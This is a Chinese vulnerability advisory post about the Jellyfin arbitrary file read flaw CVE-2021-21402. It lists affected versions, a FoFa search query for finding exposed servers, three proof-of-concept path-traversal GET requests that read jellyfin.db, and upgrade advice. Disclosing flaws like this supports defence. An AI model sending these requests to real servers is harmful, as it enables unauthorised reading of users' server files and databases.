Jellyfin任意文件读取漏洞(CVE-2021-21402)

  • A+
所属分类:安全漏洞

漏洞简介

Jellyfin任意文件读取漏洞(CVE-2021-21402)

      Jellyfin 是一个自由的软件媒体系统,用于控制和管理媒体和流媒体。它是 emby 和 plex 的替代品,它通过多个应用程序从专用服务器向终端用户设备提供媒体。Jellyfin 属于 Emby 3.5.2 的下一代,并移植  .NET 核心框架,以支持完全的跨平台支持。

Jellyfin任意文件读取漏洞(CVE-2021-21402)

漏洞描述

Jellyfin任意文件读取漏洞(CVE-2021-21402)

       Jellyfin10.7.1版本中,攻击者恶意构造请求将允许从Jellyfin服务器的文件系统中读取任意文件。当Windows用作主机OS时,此问题更加普遍。暴露于公共Internet的服务器可能会受到威胁。在版本10.7.1中已修复此问题。解决方法是,用户可以通过在文件系统上实施严格的安全权限来限制某些访问,但是建议尽快进行更新。

影响版本:Jellyfin<10.7.1

Jellyfin任意文件读取漏洞(CVE-2021-21402)

搜索引擎


Jellyfin任意文件读取漏洞(CVE-2021-21402)

注:互联网资产非授权请勿测试

FoFa搜索:"Jellyfin"

Jellyfin任意文件读取漏洞(CVE-2021-21402)


Jellyfin任意文件读取漏洞(CVE-2021-21402)

漏洞复现

Jellyfin任意文件读取漏洞(CVE-2021-21402)

POC

GET /Audio/anything/hls/..datajellyfin.db/stream.mp3/ HTTP/1.1
GET /Videos/anything/hls/m/..datajellyfin.db HTTP/1.1
GET /Videos/anything/hls/..datajellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1


文件读取


Jellyfin任意文件读取漏洞(CVE-2021-21402)




Jellyfin任意文件读取漏洞(CVE-2021-21402)


整改建议

Jellyfin任意文件读取漏洞(CVE-2021-21402)

更新到最新版本:V10.7.1

参考链接:
https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1



Jellyfin任意文件读取漏洞(CVE-2021-21402)











END

长按识别二维码,了解更多


Jellyfin任意文件读取漏洞(CVE-2021-21402)


本文始发于微信公众号(易东安全研究院):Jellyfin任意文件读取漏洞(CVE-2021-21402)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: